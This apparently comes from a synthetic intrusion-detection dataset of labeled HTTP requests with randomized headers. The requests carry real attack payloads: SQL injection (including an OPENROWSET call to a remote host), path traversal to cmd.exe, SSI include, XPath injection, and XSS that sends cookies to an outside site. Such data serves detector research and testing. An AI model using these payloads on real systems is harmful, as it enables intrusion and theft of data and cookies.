Transfer-Encoding: hlwlr
Upgrade: gtaeas/6.8, ae9e/5.6, rdaei/1.7, ilto/8.7, n5w/5.4
Warning: 050 47.45.71.159 "xvo7fEn2eRnq" 
X-Forwarded-For: 42.114.104.151
X-Serial-Number: 29366252
----: ---------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 42263
Start - Id: 46544
class: XSS
GET /<SCRIPT>/? HTTP/1.0
Host: www.opeidle.gov
Connection: omcltNc
Accept: video/mpeg;q=0.2, image/*;q=0.1, image/png;q=0.0
Accept-Charset: *
Accept-Encoding: *
Accept-Language: Nmri-Ee5emyrr, 8-ygao6;q=0.3, hosgEefT-w;q=0.5, o-8j;q=0.7, wkx-r8w
Cache-Control: only-if-cached
Client-ip: 210.91.165.32
Cookie: srnblaIaksxt=1823
Cookie2: $Version="0"
Date: Sun, 04 Oct 09 05:25:14 UTC
ETag: W/"u2fAqilJFYAF0Ew"
Expect: 100-continue
From: ns7rogjc@npah.it
If-Modified-Since: Sat, 17 Jun 06 03:18:15 CET
If-Unmodified-Since: Sun, 08 Jun 08 23:39:43 GMT
If-Match: *
If-None-Match: "hPGt9QnybP6VRaKXg"
If-Range: Wed, 30 Dec 09 11:28:25 CET
Max-Forwards: 8
MIME-Version: 8.9
Pragma: ihi=rz4e
Proxy-Authorization: Digest username="rgww0see"
Authorization: Digest uri=/heoeOt8.bin
Range: 2794-2,-4107
Referer: /pnlbaer/sbwt/a7mssxs/eeo4ome/aieatoUr.jpeg
TE: trailers,trailers
Trailer: Pragma
User-Agent: 3aihs/5.4
UA-CPU: 68000
UA-Disp: 884,253,8
UA-OS: FreeBSD
UA-Color: color16
UA-Pixels: 139x000
Via: el3e/9.3 www.apdoaE.js:684, 3.8 79.205.68.35
Transfer-Encoding: gzip
Upgrade: m51if/7.5, rhhtal/3.2, em5Twu/2.8, pvaaul/4.8, ar9/6.0
Warning: 034 www.etht.jpeg:884 "dpke7ieui1ew0" 
X-Serial-Number: 907134703793407479
----: ---------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 46544
Start - Id: 43916
class: OsCommanding
GET /_vti_bin/%2e%2e%2f%2e%2e/%2e%2e%2f%2e%2e/%2e%2e%2f%2e%2e/winnt/system32/cmd.exe?/c+dir HTTP/1.0
Host: www.trhbhteC.de
Connection: 9h4i7sa
Accept: image/png, text/*, video/*
Accept-Charset: *
Accept-Encoding: *
Accept-Language: *;q=0.9
Cache-Control: no-store
Client-ip: 134.255.20.254
Cookie: C4id5ehttps=[? p;Wseu=logatzloghttpsrs rrahoilm s;issm1h5g=hze?s;ymseepai6efrmae=seo;pntspre2cRkggen=0539052709
Cookie2: $Version="44"
Date: Sat, 13 Dec 08 04:35:29 GMT
ETag: "m.Xsix2eYp_WcagM1-r"
Expect: iahe=MeGsltt;ntEYm3e
From: nehsxlsR@ou1hri.fr
If-Modified-Since: Sun, 01 Oct 06 20:35:12 UTC
If-Unmodified-Since: Thu, 04 Feb 10 23:44:25 UTC
If-Match: "wUYpfCXl6otd5uZX"
If-None-Match: *
If-Range: Sun, 17 Dec 06 16:19:22 CET
Max-Forwards: 25
MIME-Version: 9.1
Pragma: no-cache
Proxy-Authorization: Basic dEFlNm1kMDpoZE9k
Authorization: Basic dHRsYXM6bDJyZHJlY0w=
Range: 6652-,-36477,66590-93
Referer: http://lwsm.st/aXeusgg/1ihvdhi.tar.gz
TE: trailers,chunked;q=0.3
Trailer: Accept-Language
User-Agent: a4LhuuGrt http://www.yaaiu.com
UA-CPU: StrongARM
UA-Disp: 527,703,32
UA-OS: Windows 95
UA-Color: color16
UA-Pixels: 349x5070
Via: HTTP/6.4 30.69.208.49:1143, HTTP/8.0 142.51.63.146
Transfer-Encoding: 3pir; riee=oetd
Upgrade: ezwy/1.5, eqeld/8.1, sddee/2.4, yghane/1.4
Warning: 501 123.151.211.66 "eDet3" 
X-Forwarded-For: 206.43.118.58
X-Serial-Number: 83787585359566262
----: --------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 43916
Start - Id: 42345
class: SqlInjection
GET /insertWwgVW0aBp/sOPWglKPrBbo/9ceptSah/yl2emtSLft9e5eo6/e63Dk_Q5vC5YtWD/p7shutdowne.css?tytsayfE=3&agondta=eyaopidoknC&emt=iiRressupemE&e5enuhr3stL=%3B+++insert+into+OPENROWSET%28++++%27SQLoledb%27%2C%27uid%3DtdrohA5%3Bpwd%3D9minibe%3BNetwork%3DDBMSSOCN%3BAddress%3D142.91.4.145%2C1433%3B%27%2C%27select+++*++++from++++_sysdatabases%27++%29%3B+select++*++++from+LinkedOrRemoteSrv1.master.dbo.sysdatabases&EttOjowitIelio=61161&Srl3bishls=9817252948&nSWuFhf8Jsock_stream=oitt%7Emes+piifinull&childLVhzq=1yrgyrr5ucec&aFBR4ZK=fBaY2zefF&eelSmw9laobSo=45 HTTP/1.1
Host: 56.242.155.254
Connection: anai
Accept: text/html, image/*, image/jpeg
Accept-Charset: ks_c_5601-1987;q=0.0, iso-8859-4;q=0.4, windows-1258;q=0.3, gb2312;q=0.2, utf-7
Accept-Encoding: *;q=0.2
Accept-Language: *;q=0.0
Cache-Control: only-if-cached
Client-ip: 234.69.56.127
Cookie: iikaiyol8=ouye;EaVtw6rryn= qbe
Cookie2: $Version="85"
Date: Thu, 19 Oct 06 23:19:29 GMT
ETag: "OVVBmY_Rb3C9MGri_gO"
Expect: 2umiebtT=nsiyaDcL;shjh=2fwn
From: 9quNt@ct6Iewpcw4.cz
If-Modified-Since: Mon, 25 Dec 06 20:32:14 CET
If-Unmodified-Since: Tue, 14 Oct 08 22:14:54 UTC
If-Match: *
If-None-Match: *
If-Range: Wed, 09 Jul 08 24:27:17 UTC
Max-Forwards: 105
MIME-Version: 5.2
Pragma: no-cache
Proxy-Authorization: nrRny etsaey=elewdabt
Authorization: baldw 1aneseaa=tt40ou
Range: -42018,-510767
Referer: http://www.tqsitn.com/cgsE/e8wueheh.js
TE: chunked;q=0.8,trailers
Trailer: Proxy-Authorization
User-Agent: airjrzg (oXzkVDKc; sOwezMjW2h; s5skQ30; fG-6G-@)
UA-CPU: x86
UA-Disp: 695,8049,32
UA-OS: Mac OS X
UA-Color: color32
UA-Pixels: 999x243
Via: 5.6 www.ne60Iht.tiff
Transfer-Encoding: identity
Upgrade: aia9y/5.8, shfr/4.4, ssoa/6.4
Warning: 478 44.68.67.163:8 "haHdehmpgh" 
X-Forwarded-For: 171.143.1.2
X-Serial-Number: 71261
----: ----------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 42345
Start - Id: 41641
class: SqlInjection
GET /u3sW/eD4lbQH/6RbCYoFocND/fjv6aekhcei.asmx?gc1ucDrernnh=OR+%27OReisto%27++BETWEEN+++%27R%27+++++AND+++++%27T%27 HTTP/1.0
Host: www.odbu.ch
Connection: s4tihin
Accept: text/*, application/*, text/plain
Accept-Charset: *
Accept-Encoding: 
Accept-Language: tjoo-Mmwa
Cache-Control: max-age=5
Client-ip: 94.45.7.230
Cookie: dhdsnMmmketou5=306525;access_log4nba=036139132;he6jj0ineberRf=cprda
Cookie2: $Version="408"
Date: Fri, 08 Jan 10 05:40:46 GMT
ETag: "RUw27n@HrEB-YAKv"
Expect: 100-continue
From: vlIol@haea.org
If-Modified-Since: Wed, 02 Nov 05 08:26:08 GMT
If-Unmodified-Since: Thu, 12 Apr 07 15:53:26 CET
If-Match: "Vpnm6_tx@bTkEsTmda"
If-None-Match: "TZlZS0tDeL5762D4jDCA"
If-Range: Tue, 04 Nov 08 24:18:15 GMT
Max-Forwards: 6
MIME-Version: 5.1
Pragma: no-cache
Proxy-Authorization: NTLM bG5sc2NhT05hdHJyZnVhRWljaWVub3B4eThwc2hUaWhocmgxb2FnYnRiMXo1dw==
Authorization: NTLM bmlkZHRkOXNoZGU3dGJ2c2RiZXJQOWEwZXRvbW9lZnNvUlBONQ==
Range: -11289
Referer: http://www.eeaoi.com/sl5vboo/cmsim/igojn/adsu.tar.gz
TE: chunked,trailers,trailers
Trailer: Upgrade
User-Agent: Mozilla/3.7 (Machintosh; U; PPC Mac OS X 7.8; op-do; rv:9.5.6) Gecko/32661784
UA-CPU: Sparc
UA-Disp: 041,9154,16
UA-OS: FreeBSD
UA-Color: color8
UA-Pixels: 064x464
Via: rmhrf/0.8 170.142.68.76:692, 1.0 192.62.242.106:7
Transfer-Encoding: gzip
Upgrade: liaory/2.2, awo4ag/4.5, oil/7.5, ctOl/2.3, see/4.6
Warning: 419 www.riae.jpeg "t4xtspnneyygypw1bdf" "Thu, 20 Aug 09 21:25:22 GMT"
X-Forwarded-For: 239.30.161.125
X-Serial-Number: 215683669428
----: -------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 41641
Start - Id: 41583
class: SqlInjection
GET /s4YQq1gm1CSGH@2-AU/mmirlbpnoc/yZoq/Zaamoqc6zaejethe/ayZPAKmqqoxN./zibhetas5uT8rdspee.aspx?xnt=cW1&ROTxT=709298&bw8exfn=%27++OR+%27R8i5Yg9roahqhna%27%3D++++%27++++&oyer=xswa%3Ate++tahxeoeyHa&eda=%2F+M&5sas8onyas=firIwwEhsprYcte&826teitflh=unw6+iskconnectqNc+sp4ea&4tinroqi=ybxt4R HTTP/1.1
Host: 101.28.205.148
Connection: dan7bttb
Accept: */*
Accept-Charset: *
Accept-Encoding: *;q=0.9
Accept-Language: h-i;q=0.0, lisoatiO-zd;q=0.6, runweerl-oduSa
Cache-Control: min-fresh=2
Client-ip: 38.173.11.46
Cookie: sessiriri=unionscriptA2nivbscriptbetween1eefebarsfo;exiahceTHt5=%d~;hzie1uE9s4=62;atMsitsxee=dg3tnullicala;qrnsernua8th= ss;7h=@
Cookie2: $Version="8"
Date: Sun, 06 Aug 06 22:10:02 GMT
ETag: W/"W0@RJky9TsVAqhWET"
Expect: 100-continue
From: xwfji@6eera.be
If-Modified-Since: Tue, 13 Jul 04 16:18:48 CET
If-Unmodified-Since: Sun, 11 Apr 04 21:54:00 GMT
If-Match: "f-qYG_DDORq5mdaMr57"
If-None-Match: *
If-Range: *
Max-Forwards: 5
MIME-Version: 8.9
Pragma: no-cache
Proxy-Authorization: iIehv ce1Orilo=oaerTe0
Authorization: NTLM aW91c3Nqa1d6dGhpRE5zaWhhaTJlcm0xaXl1dHdlMmh5eno2dG8=
Range: 57313-1061,-0,406-
Referer: http://tsn5it1.biz/v9llbel/ecR4ed/ng7a.jsp
TE: trailers,trailers,gzip
Trailer: If-Range
User-Agent: mhcoem5n/0.7
UA-CPU: StrongARM
UA-Disp: 989,4955,16
UA-OS: Solaris
UA-Color: color16
UA-Pixels: 1236x139
Via: 1.0 90.253.117.188, HTTP/9.3 www.uehcE.jpg
Transfer-Encoding: identity
Upgrade: rtu9j/1.3, ayt1st/7.1, iEp/9.8
Warning: 480 www.mfahnai.css "oldac4" "Mon, 15 Jun 09 01:00:23 UTC"
X-Forwarded-For: 166.15.230.232
X-Serial-Number: 124390233
----: ----------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 41583
Start - Id: 40450
class: SSI
GET /io02po2hnt3aooww4/t57Uoqe.EE/s9YYoDVXVQ6Wk5I17g3o/V@8unionyGX/vamQ4SA/69UYuC_@SAAa/tw9YLM5.iC_Ii4/d7xGe0u2oorhrmhpiqo.tiff?9ljrdiih=oMruenrsO&tei=%3C%21--%23include+++virtual%3D%22d%3A%5Cwindows%5Cautoexec.bat%22+++--%3E&t2rt=++serviceszhtacces&tndddfemstjb=Cahiiteocbrdbeie&sasvqaoe=dnirtmpeboot.inioechoN%27eRn&0wky0XZNe3C=hnineoxzgEmv&ss6=hLhsfPea&xtermKGdU0F=englinkh4ex4eltN&sbnhamecraeit=rO9&elLtAsEia3e9to=wai HTTP/1.1
Host: www.ereo.be
Connection: keep-alive
Accept: application/*;q=0.0, text/html;q=0.6, video/mpeg
Accept-Charset: *;q=0.3
Accept-Encoding: *;q=0.7
Accept-Language: *
Cache-Control: max-age=724
Client-ip: 95.206.188.178
Cookie: 6VA5ZC=RnltNtr
Cookie2: $Version="879"
Date: Sat, 30 Dec 06 17:27:23 CET
ETag: "63htvQ03lV1P1aqZu@3F"
Expect: rrrg=oiemmt5t
If-Modified-Since: Thu, 11 Dec 08 10:35:25 GMT
If-Unmodified-Since: Wed, 04 Jan 06 13:51:29 GMT
If-Match: *
If-None-Match: "Rku@O.tZCM7jQAR"
If-Range: "dRvIvZRddlTCwMD7U"
Max-Forwards: 84
MIME-Version: 3.0
Pragma: atx='wnt5'
Proxy-Authorization: 2eg8q 4ltgtAr9=na5Ilsmg
Authorization: acsiwL tdev=strelNks
Range: 648391-0593,082-86156,297927-83
Referer: http://fxer.com/dHnr/selegtlV.nsf
TE: trailers
Trailer: If-Match
User-Agent: Mozilla/8.3 (Windows; U; Win 9x 7.2; el-rm; rv:6.1.9) Gecko/72307391
UA-CPU: 68000
UA-OS: Windows NT
UA-Color: color8
UA-Pixels: 4401x4707
Via: 2.3 www.doexed.js:4, 1.8 91.90.217.47
Transfer-Encoding: compress
Upgrade: Fet/1.1, nsHe/6.2
Warning: 037 www.zncew.jpg "u3loce3odp3oeC" 
X-Forwarded-For: 51.175.205.249
X-Serial-Number: 9011770
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 40450
Start - Id: 35079
class: SqlInjection
GET /3At0aH./d6unpTdolgdlbQlieag/k6H/mbIde/ybS8B59/iitt8diYkn6rcsthe.css?eahcoer2t=o&EPTBvoAPNYUN=s&ty9oetA7=15227&1adeT5i5te=husrPd&sgioresdbckhYi=bTrrreetcmcy%2Fawte1htacces&tjtsdtrt=+AaaemochaFie%26cdpositionr3&hn=imatyj%25oaL HTTP/1.0
Host: www.ltlaNome.gov:80
Connection: keep-alive
Accept: video/*
Accept-Charset: *;q=0.1
Accept-Encoding: '     OR     'idegsipeda' =   '   
Accept-Language: et-QryEhgs
Cache-Control: edaoohee=hfnsl
Cookie: y1eiwyqtseaste=odae8essesbodtcn;ona=73;gg=6;ghs6rrTex=fae;nhacKmwnhs=hr9nehaaetaauea;sI=eqdtaA8httpit
Cookie2: $Version="52"
Date: Thu, 07 Apr 05 06:23:48 UTC
ETag: "8J.PtOrQ4ynhF_j5"
Expect: 100-continue
From: Icdw@di9ssorE6e.com
If-Modified-Since: Wed, 15 Jul 09 20:08:30 UTC
If-Unmodified-Since: Fri, 16 May 08 01:17:52 GMT
If-Match: "2T4W47dKpChKoewC"
If-None-Match: "OOCs16b1Z_HEiZd-gtn"
If-Range: "X8.sNdxrpoGpgem0"
Max-Forwards: 6907
MIME-Version: 4.5
Pragma: iqHthsb='rcbiu'
Authorization: Digest nc=fb5F43EE
Range: 403-
Referer: /kp86n/UJaa/jscoh.pdf
User-Agent: Mozilla/9.0 (compatible; oyanlveoc; WinNT; gSal5a)
UA-CPU: MIPS
UA-Disp: 7830,290,16
UA-OS: Linux
UA-Pixels: 4116x971
Via: 2.2 180.28.6.162, HTTP/6.4 www.8zccpsv.html, 3.3 www.izDAsrb.htm
Transfer-Encoding: compress
X-Serial-Number: 51475
----: ------------------------------------------------

null

End - Id: 35079
Start - Id: 42147
class: SqlInjection
GET /Moia5H.shtml?3XtLU-_=esa&HtV6jPJQtqAT=3&Waoxrefe=H6lskl&oiUntavelqt3t=%27++++%29+UNION+++++ALL+SELECT+++il9+FROM+e9haidtnag++++WHERE+%28++++%27%27+%3D++++%27&ouPPgYrmH60O=doe%3C HTTP/1.1
Host: www.imtT.org
Connection: iatl8ee
Accept: image/jpeg, audio/basic;q=0.4
Accept-Charset: iso-8859-8;q=0.7, x-mac-korean
Accept-Encoding: 
Accept-Language: my-aHaa5e
Cache-Control: no-store
Client-ip: 117.221.83.105
Cookie: ch.P=04088
Cookie2: $Version="903"
Date: Mon, 22 Oct 07 22:58:48 UTC
ETag: W/"R.zF5Up0kwBtPzZ-DN7V"
Expect: 2tic
From: yaieolw@dAieet.st
If-Modified-Since: Thu, 16 Jun 05 06:24:24 UTC
If-Unmodified-Since: Thu, 01 Apr 10 23:17:11 GMT
If-Match: *
If-None-Match: "8NqXtTm@LnpvLXRAm"
If-Range: "8aGjbRfovFp.lSygXe"
Max-Forwards: 0
MIME-Version: 0.7
Pragma: ki=hAeop
Proxy-Authorization: Digest response="EDaFEE464Cd220549436Ba0ec5F670E1"
Authorization: Digest realm
Range: 4781-
Referer: http://uwrttind.fr/natObr/aenu/2reTt0e/xtbln.asmx
TE: deflate,trailers
Trailer: Authorization
User-Agent: Mozilla/5.5 (Windows; U; WinNT 0.5; es-dd; rv:5.4.5) Gecko/36369760
UA-CPU: StrongARM
UA-Disp: 2259,521,32
UA-OS: Windows 95
UA-Color: color16
UA-Pixels: 063x2185
Via: HTTP/7.8 203.237.173.224:14, 0.2 www.npizcqp.css:66794, FTP/9.6 www.BJdA4t.jpeg
Transfer-Encoding: gzip
Upgrade: 9lrrsw/6.5, henvno/5.4
Warning: 795 www.ocntp.jpg "satrsjzkse" "Sat, 22 Aug 09 08:49:22 CET"
X-Forwarded-For: 229.231.134.44
X-Serial-Number: 036660331124122
----: -----------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 42147
Start - Id: 41309
class: SqlInjection
GET /Ef6CWQ/gNC@xIsLw/ped3seeIdoI/GiFCn3/so6udAt/WFRCnph-W9BC5/3wnE/oCfuuogeAkI.asmx?jfeyu=8633969&yytorniaty2=iimoeinclude%7Ctelnetaqchild6hs%26zsu+a HTTP/1.1
Host: www.kn6R.gov
Connection: keep-alive
Accept: text/html;q=0.7, video/quicktime;q=0.2, audio/*
Accept-Charset: *;q=0.5
Accept-Encoding: *
Accept-Language: bDqmp9e-toeg;q=0.7
Cache-Control: max-age=3872
Client-ip: 240.155.203.208
Cookie: tefewe=ie gwxmltn0fwhereiiconnectce;iret=(mt=lwhere;0elaRhemht=' union select    sum(zf) from    eto--
Cookie2: $Version="48"
Date: Tue, 04 Oct 05 12:28:52 CET
Expect: mhoc
If-Modified-Since: Sun, 12 Feb 06 03:49:16 GMT
If-Unmodified-Since: Mon, 16 Feb 04 11:36:15 CET
If-Match: "phNdOK6XvC.xxXVAXY"
If-Range: "KQ@Y-p@mjk1oI.GiPypN"
Max-Forwards: 487
MIME-Version: 0.9
Pragma: no-cache
Proxy-Authorization: Digest uri=http://ay8ia0.net/4aipn/tstttue3/ioje.jsp
Authorization: Digest cnonce="aeess"
Referer: http://www.xNoz4wmf.uk/0bfw1bAi/oro8.html
TE: trailers,deflate;q=0.2,trailers
User-Agent: Mozilla/7.9 (compatible; MSIE 0.4; Windows NT; aAoooa)
UA-Disp: 268,3719,32
UA-Color: color8
UA-Pixels: 6806x575
Via: 0.2 www.tdie.jpeg, FTP/0.3 www.eoEeaxp.js, HTTP/7.7 www.ka7t.html
Transfer-Encoding: ztkeht
Upgrade: uis/3.7, rseS4/1.4, nly/4.5
~~~~~: ~~~~~~~~~~~~~~~~~

null

End - Id: 41309
Start - Id: 49023
class: XPathInjection
GET /okvZzWLQAyAUXTDk-/f8Eng7C74S/isfpuhorha5ies/8G86HcV937swJc/yK3B/lZb3cwwcMh@2zeL/aB53/syOyKVE/ty/shkh5QgnAQ/bgixiscveewt/mh.O.mdb?eroenevtNvbc=ggte6iiehdr&bTE=wMkzRTv0&Is9da=05+or++++count%28path%2Fchild%3A%3Anode%28%29%5Bposition%28%29%3D%28%28i%2Bj%2Bk%2Bl%2B1%29%5D+++++%7C++path%2Fchild%3A%3A*%28%29%5Bposition%28%29%3D%28k%2B1%29%5D%29%3D1+++or++++187%3D&cZv8HpKz=e&nu=epGbJWzUwEyq&iehtMcru=i%25ol&euoih7tuuchNtsw=Oaquooasthhs5 HTTP/1.1
Host: 51.222.150.188
Connection: keep-alive
Accept: image/*, audio/*;q=0.3, application/postscript
Accept-Charset: *
Accept-Encoding: identity, deflate;q=0.4
Accept-Language: rihEaeje-adiaaelh;q=0.8, qtogr-eOne;q=0.8, lrt-w;q=0.4, t-fhs5aIm, edrooe-ytsasdn
Cache-Control: max-stale
Client-ip: 89.184.173.185
Cookie: 7OVp8JXstdinn1=ypfssp3go;3iudtzi2nm8=rmwch5oozbgpzo;tir8ttsue3tne=357;1ceemateegizx8=8838;jeholwmcalumoi=jtAnnrsbitsreae;qgtebtpeSu=rr
Cookie2: $Version="4"
Date: Sun, 18 Mar 07 19:24:07 UTC
ETag: "hqas.qShK2Qyew_tqh"
Expect: asneEri=oe6du;Oioao=uoxeyx
From: oc6etY@0uezaiml.cz
If-Modified-Since: Sun, 10 Feb 08 18:26:22 UTC
If-Unmodified-Since: Sun, 21 Sep 08 22:52:12 GMT
If-Match: "Ed3i-XvroSmJ0AiKxP"
If-None-Match: "ty_Ki87YMOpe8dpkshkX"
If-Range: *
Max-Forwards: 94
MIME-Version: 9.3
Pragma: no-cache
Proxy-Authorization: Digest username="ehcteu"
Authorization: Basic MWVtaG5uOmlsdGRp
Range: -31
Referer: /cqb5/robn1o/2endei9/ooirkeT4/dBaktIJr.mspx
TE: trailers,trailers
Trailer: Warning
User-Agent: 3asTBnin/4.7.8
UA-CPU: 68000
UA-Disp: 119,4854,8
UA-OS: Mac OS X
UA-Color: color8
UA-Pixels: 1840x9062
Via: HTTP/2.4 159.197.112.36
Transfer-Encoding: compress
Upgrade: l7T/6.8, egesr/9.6, aotEhh/5.3, leolo/7.4
Warning: 832 www.aeh0a9i.js:7 "omte8QStoehr7LPtw" 
X-Forwarded-For: 216.15.10.143
X-Serial-Number: 729105256131367
----: ------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 49023
Start - Id: 47686
class: XSS
GET /o8taaa/fsanfisTkr8/oha4dheaf3kddrsxAyci/anzEHkodmcitqaeotro/cdaettglts/nElcsnieyiTey3eser7/la3orivsrmaateu/8iItovnhoaEt/nl.pl?v3azsr=nruwt3uo&s1ug10t=4&7h-Csk_vea=nolrtmea&sEt=%26%7B%5Bdocument.location.replace++%28%27http%3A%2F%2Fwww.ni.com%2Fcgi-bin%2Fisetnema.cgi%27%2Bdocument.cookie%29%3B%5D%7D%3B&mmeyzoeyuhTapdu=uritToktcmq&ryewx=ct&shto4sjsn5qo=5a%2Bmv8naOathDallx&zjhrmoz=nss&eprcehuee=h+stni%408selectj97ou&ohAtnhrbo=181&gnhipaEfh6uvlt=mT2.-5fK1i HTTP/1.1
Host: 144.32.30.38
Connection: keep-alive
Accept: image/jpeg, audio/x-wav, text/html;q=0.0
Accept-Charset: *
Accept-Encoding: *;q=0.1
Accept-Language: tiuvPm-weoirwt;q=0.9, a-ttcie66, hrc-tnu2lhg;q=0.2, p6u-tde, iatoRs-oaanttr7
Cache-Control: emaloo=m
Client-ip: 90.94.4.212
Cookie: Eomdthteiacdi=oE3tr5bin;1ok=e/uevusr etg
Cookie2: $Version="702"
Date: Wed, 22 Feb 06 11:56:57 GMT
ETag: W/"Eq97YhvLU4pU-3OPMp"
Expect: 100-continue
From: zlDtEnh@hmvarofRt.ch
If-Modified-Since: Tue, 06 Dec 05 22:14:46 GMT
If-Unmodified-Since: Sun, 28 Aug 05 23:36:00 GMT
If-Match: "GZpXPjgUThO8Eep"
If-None-Match: "pLvXZnxw1FRZ8P24f4Bj"
If-Range: Fri, 23 May 08 14:20:04 GMT
Max-Forwards: 2
MIME-Version: 0.2
Pragma: osmEtiru=atSMfd
Proxy-Authorization: NTLM eXR0b2RubmMwbEhzaWVlZWUzZWhpZTJtcm5ucmluQWVzdzk2T3JlcmFUanU=
Authorization: NTLM ZW9MOWdkZW55cmdubmlyZW1oZTlpZUFlbzhnNjMxbDgwaGVlSUlvd3h0bmxU
Range: 70-,2-,3-3356
Referer: /Gnttfhyi/mNbair/coeigk.shtml
TE: trailers,gzip,trailers
Trailer: From
User-Agent: Mozilla/1.3 (compatible; oanrbwymlh; Win 9x; iSnNr; cecaet; rrtonMcca)
UA-CPU: 68000
UA-Disp: 9242,0652,8
UA-OS: Linux
UA-Color: color32
UA-Pixels: 934x7117
Via: 5.3 www.l1tx7en.tiff:1036, Neege/1.9 www.n9ke.tiff:28, 9.0 194.87.40.114
Transfer-Encoding: cn58; a6i2Sld=sdarmpth
Upgrade: e33s9E/0.6
Warning: 797 10.182.112.205:62 "mparhiqesWqMnqIet2" 
X-Forwarded-For: 218.241.223.131
X-Serial-Number: 6943669939
----: --------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 47686
Start - Id: 41338
class: SqlInjection
GET /ri38nhctcr/.R0a0WCjcT/ebtfeeco/fIcNwYDacceptM/y04/wD8Vuzj.p8rJyOPE/yoyudFAcOlrGGFRn.aspx?65TSdOQ=8868491&4enmtr=73010771&aocndd=50979349&vona=tIhLII_vuAHh&Ctrk9oR=mgRtyodNaloh&dnmnhe=otnkditexbrhwRtnlp HTTP/1.0
Host: www.eEolsDaek.de
Connection: Iasy96t
Accept: audio/*;q=0.3
Accept-Charset: windows-1257;q=0.9, euc-tw;q=0.4, iso-8859-8-i, iso-8859-2, x-mac-hebrew;q=0.7
Accept-Encoding: identity;q=0.9, gzip;q=0.2, identity;q=0.2, compress;q=0.7, identity
Accept-Language: rjVae-rs;q=0.3, onsNie-q;q=0.4, c5ewhNac-yr5pa3;q=0.1, R8-e;q=0.4
Cache-Control: max-stale
Client-ip: 87.232.160.255
Cookie: atODsrasmbTis=select Tei8mte   from  ALL_USERS
Cookie2: $Version="717"
Date: Sat, 15 Jan 05 19:07:49 GMT
ETag: W/"mn0GAu5OZA6WTeP1S"
Expect: tsIt=hhr2ifs
From: oprs@hshefehi.biz
If-Modified-Since: Fri, 25 Nov 05 08:41:34 GMT
If-Unmodified-Since: Sun, 28 May 06 12:43:34 CET
If-Match: "kuraDvtaabmO.s1Nu"
If-None-Match: "engWtzxJ1tKUwobJH6"
If-Range: "9Lv.ouizKH0pBfu"
Max-Forwards: 16
Pragma: t='o6q0s2h'
Proxy-Authorization: imhseH tefiqi=eset
Authorization: NTLM M2RlTjNpdEVmZmV0cnNxdGlqb3N1cnd0b3MyaWRuYWRzaHVlZk5zdGh0SXR3Y0M=
Range: 481797-7272,-0
Referer: /s6bllh/khea5.swf
TE: trailers,gzip
Trailer: Accept-Encoding
User-Agent: nsso@nJOKT http://www.jwWetn.st
UA-Color: color32
UA-Pixels: 431x942
Via: 3.9 176.240.109.46
Transfer-Encoding: gzip
Upgrade: lrh3x/8.6
Warning: 221 www.ieHmnseN.shtml "tc0exeLby" "Thu, 15 Apr 10 21:19:31 UTC"
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 41338
Start - Id: 35820
class: XPathInjection
GET /c7@7/wGQqq/4an2inh6atshmylhyeei/en.@/n2kepRECljKbG@Pv3k6/fTuLZl_F./oF_Oscript/_A4T1R6.jpeg?jrEdew=7982&rsgar=+oumexecxumymetaeujpassthrus&Teeeh=314&s@IVKdR0var=%2F%2Bsselecte&ctponiengnew6mx=+ascriptimee+s+%259&sctsEjt=wcmrlymz4&Mw6hEsincludeAalllocationVg=rXM&eIidat=9212++or+++++count%28path%2Fchild%3A%3Anode%28%29%5Bposition%28%29%3D%28%28i%2Bj%2Bk%2Bl%2B1%29%5D+++++%7C+path%2Fchild%3A%3A*%28%29%5Bposition%28%29%3D%28k%2B1%29%5D%29%3D1++or+++329%3D HTTP/1.0
Host: 8.48.43.120:80
Connection: close
Accept: audio/x-wav
Accept-Charset: gb2312;q=0.3, x-mac-arabic, utf-7, windows-1257;q=0.7, euc-cn
Accept-Encoding: 
Accept-Language: *
Cache-Control: no-store
Client-ip: 46.200.186.58
Cookie: o7zeida1rmsonle=ts3edH1cisfseSe5te;vEGcn=dassntoArUiFe;dsClr=wglrlt4d8awfnr5hae;2c3oIgrZora=pd$o;nc6=bZ00l
Cookie2: $Version="2"
Date: Mon, 26 Jul 04 05:13:27 UTC
ETag: W/"TDdCVuwTf@X.YXZx"
Expect: 100-continue
From: a2frd@mttrrPoVI.gov
If-Modified-Since: Sun, 16 Jan 05 02:53:56 GMT
If-Unmodified-Since: Sat, 09 Feb 08 15:51:28 GMT
If-Match: "OZ1Md3zff@LVMyik2"
If-None-Match: *
If-Range: Thu, 08 May 08 14:51:39 GMT
Max-Forwards: 5
MIME-Version: 7.4
Pragma: no-cache
Proxy-Authorization: luLc Okt8e=3llo
Authorization: NTLM bnQ0aHNzZW50YlVuOWdqNmQ4cmtlcmlsdE5vbW54bmVsNFUybW10dGVJZWhzdGl0
Range: 205-0247
Referer: /ikebir/sri6ej/uoIAesO/ifuzT.pl
TE: trailers,trailers
Trailer: Via
User-Agent: Mozilla/5.3 (X11; U; Linux i386 4.8; rn-hr; rv:4.3.1) Gecko/51866703
UA-CPU: x86
UA-Disp: 747,476,16
UA-OS: Linux
UA-Pixels: 4135x5853
Via: enaEsh/7.3 93.96.205.177:2, FTP/9.8 137.136.214.140, 9.5 www.bhth8ims.png:438
Transfer-Encoding: compress
Upgrade: oyytm/9.6, hhc/4.5, Ojwace/7.1, toww7E/9.4
Warning: 952 www.gere3lt.gif "ajcLu" "Fri, 03 Aug 07 19:36:17 GMT"
X-Forwarded-For: 43.11.206.228
----: --------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~

null

